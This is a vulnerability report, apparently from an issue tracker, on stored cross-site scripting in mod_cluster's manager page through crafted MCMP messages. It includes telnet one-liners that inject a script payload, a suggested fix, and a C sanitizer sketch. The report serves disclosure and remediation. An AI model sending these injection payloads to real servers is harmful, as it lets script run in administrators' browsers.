- Bug
- Resolution: Done
- Critical
- 1.2.6.Final, 1.2.9.Final, 1.2.11.Final, 1.3.1.Beta2
- None
This is a nasty one indeed
Steps to reproduce
- start Apache HTTP Server with mod_cluster
- send these messages (provided your test instance listens on 127.0.0.1)
{ echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666
{ echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
- Open http://localhost:6666/mod_cluster_manager and enjoy JavaScript pop-up Alert being executed.
Impact
- Anyone with access to the (hopefully only internal) network from which MCMP messages are allowed to come could send these messages and execute arbitrary JavaScript code.
Suggestion
- Leverage apr_escape* to sanitize MCMP messages.
Proposed patch
- patch.new.best.patch: MCMP messages containing suspicious characters are discarded.
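The proposed approach, discarding MCMP messages that carry suspicious characters, sketched as an added C example; this is not mod_cluster's own code or the attached patch. The allowed character set, the 1024-byte body limit and the function names are assumptions, and the sample bodies are the two messages from the steps above.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define MCMP_MAX_BODY 1024

/* Characters a JVMRoute, Alias, Context, Host or numeric field plausibly needs
   (assumed allowlist). Markup and script characters ('<', '>', quotes, ';',
   parentheses) are deliberately absent, so they cause the message to be dropped. */
static int mcmp_char_allowed(unsigned char c) {
    return isalnum(c) || strchr("-._/:,", c) != NULL;
}

/* Percent-decode src into dst (dst holds MCMP_MAX_BODY bytes). Returns 0 on
   success, -1 on an over-long body, a malformed escape or an embedded NUL. */
static int mcmp_decode(const char *src, char *dst) {
    size_t n = 0;
    for (; *src; src++) {
        if (n + 1 >= MCMP_MAX_BODY) return -1;
        if (*src == '%') {
            if (!isxdigit((unsigned char)src[1]) || !isxdigit((unsigned char)src[2]))
                return -1;
            char hex[3] = { src[1], src[2], '\0' };
            long v = strtol(hex, NULL, 16);
            if (v == 0) return -1;           /* %00 would truncate the C string */
            dst[n++] = (char)v;
            src += 2;
        } else {
            dst[n++] = (*src == '+') ? ' ' : *src;
        }
    }
    dst[n] = '\0';
    return 0;
}

/* Returns 1 when every key=value pair of the body is within the allowlist,
   0 when the message must be discarded. Handles both a plain body (the CONFIG
   message above) and a fully percent-encoded one (the ENABLE-APP message). */
int mcmp_body_is_clean(const char *body) {
    char decoded[MCMP_MAX_BODY];
    if (mcmp_decode(body, decoded) != 0) return 0;
    for (char *pair = strtok(decoded, "&"); pair; pair = strtok(NULL, "&")) {
        const char *eq = strchr(pair, '=');
        if (!eq) return 0;                   /* each pair must be key=value */
        for (const char *s = pair; *s; s++)  /* key, '=', then value */
            if (s != eq && !mcmp_char_allowed((unsigned char)*s)) return 0;
    }
    return 1;
}
```

The CONFIG body from the report passes, the ENABLE-APP body is rejected at the '<' in its Context value, and a malformed or NUL-bearing escape is rejected outright.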